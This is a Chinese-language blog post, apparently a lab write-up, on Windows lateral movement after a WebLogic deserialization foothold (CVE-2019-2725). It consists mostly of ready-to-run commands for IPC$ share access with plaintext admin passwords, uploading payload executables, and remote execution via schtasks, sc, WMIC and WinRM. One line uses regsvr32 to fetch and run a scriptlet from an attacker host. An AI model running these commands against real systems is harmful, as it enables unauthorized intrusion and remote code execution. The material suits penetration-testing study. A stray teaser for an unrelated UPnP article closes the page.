/01 IPC+Schtasks
一,IPC$简介
IPC$ (Internet Process Connection) 是共享”命名管道”的资源,它是为了让进程间通信而开放的命名管道,通 过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程 计算机的访问。
二,利用条件
- 开发端口139,445端口
- 目标开启IPC$文件共享服务
- 需要目标机器的管理员账号和密码
依旧是前期的信息收集:知道WEB一个IP进行nmap探测对方开放端口
开发了7001可能是weblogin:
老版本的weblogin11g,尝试下反序列化: CVE-2019-2725
再将payload转移到CS上面hashdump,msf的获取域内shell:getsystem有点问题(后来证实payload选择windows/x64/meter,而不是windows/meter)。cs就很好用使用payload_injured模块
得到了密码下面就可以进行横向移动了。
先进行内网探测
探测出有10.10.10.201和10.10.10.80
三,常用命令
1.连接
1 |
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx" |
2.查看连接情况
1 |
net use |
3.查看目标主机时间
1 |
net time \10.10.10.201 |
4.删除连接
1 |
net use \10.10.10.201ipc$ /del |
5.文件上传下载
1 |
copy shell.exe \10.10.10.201c$windowstempplugin_update.exe |
四,Schtasks
允许管理员创建、删除、查询、更改、运行和中止本地或远程系统上的计划任务 /Create 创建新计划任务。
/Delete 删除计划任务。
/Query 显示所有计划任务。
/Change 更改计划任务属性。
/Run 按需运行计划任务。
/End 中止当前正在运行的计划任务。
/ShowSid 显示与计划的任务名称相应的安全标识符。
/? 显示此帮助消息。
五,IPC+Schtasks
net连接
1 |
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx" |
查看c盘目录
1 |
dir \10.10.10.201c$ |
Copy上传文件
1 |
copy c:windowstemp808888.exe \10.10.10.201c$ |
Schtasks定制周期任务
1 |
schtasks /create /s 10.10.10.201 /u de1ayadministrator /p "!QAZ2wsx" /sc MINUTE /mo 1 /tn test2 /tr "c:1288888.exe" |
Schtasks删除周期任务
1 |
schtasks /delete /s 10.10.10.201 /tn test2 |
meterpreter拿到的shell执行这个不知道为什么会卡住
六,IPC+AT
net连接
1 |
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx" |
at
1 |
net time \10.10.10.201 |
但是在powershell里运行就很成功就很奇妙了
注意:at 在windows server 2012等新版系统中已被弃用
/02 IPC+SC
net连接
1 |
net use \10.10.10.201ipc$ /user:administrator "!QAZ2wsx" |
sc创建服务执行
1 |
sc \10.10.10.201 create test3 binpath= "c:808888.exe" obj= "de1ayadministrator" password= "!QAZ2wsx" |
这种传教服务和reg创建服务格式都是binpath= “”等号后面有个空格
删除
1 |
sc \10.10.10.201 qc test |
/03 WMIC
1 |
wmic /node:10.10.10.201 /user:administrator /password:1qaz@WSX3e process call create "regsvr32 /s /n /u /i:http://192.168.78.128:8080/feY7nzY.sct scrobj.dll" |
由于我设置了PC处于内网不能访问192.168.78.128只能访问10.10.10.0/24所以就不能这么实现了,上马方式就是regsvr32去运行我们网站上的getshell。
process all create 创建一个进程(process进程管理)
wmic命令缺点是没有回显,可以使用wmiexec.vbs脚本实现回显。
1 |
wmic /node:10.10.10.201 /user:administrator /password:!QAZ2wsx process call create "cmd /c calc.exe" |
ProcessID为创建进程的PID,
所以内网环境中比较建议使用上传马的把calc换成我们的马。
/04 WinRM
一,WinRM简介
WinRM 指的是Windows远程管理服务,通过远程连接winRM模块可以操作windows命令行,默认监听端口 5985(HTTP)&5986 (HTTPS),在2012及以后默认开启。
二,开启WinRM
判断是否开启WinRM服务
1 |
winrm enumerate winrm/config/listener |
命令开启WinRM服务:
1 |
winrm quickconfig |
环境问题(lll¬ω¬)在我的反复调试,百般爱护下终于好了
允许远程主机访问及访问远程主机
1 |
winrm set winrm/config/client @{TrustedHosts="*"} |
三,Winrs执行命令
1 |
winrs -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx ipconfig |
四,WinRM横向移动
利用winrm参数选项中的invoke参数,来对目标对象执行特定的方法。
1 |
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} |
命令调用了Windows WMI中Win32_process类的Create方法,生成了一个calc.exe的新进程
在远程机器上打开进程
1 |
winrm invoke create wmicimv2/win32_process @{Commandline="calc.exe"} -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx |
在远程机器上创建服务
1 |
winrm invoke Create wmicimv2/Win32_Service @{Name="test5";DisplayName="test5";PathName="cmd.exe /k c:1288888.exe"} -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx |
在远程机器上启动服务
1 |
winrm invoke StartService wmicimv2/Win32_Service?Name=test -r:http://10.10.10.201:5985 -u:administrator -p:!QAZ2wsx |
FROM :https://ailumao.cn/ | Author:Ailumao
本文首发于xray社区:https://mp.weixin.qq.com/s/VK5CiWa5IIiMMwf–26miA 周末测了一下屋里的几个iot设备,顺便学习了一下对于UPnP的服务如何去挖掘漏洞。这里记录一下UPnP的学习笔记。 UPnP UPnP是因…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论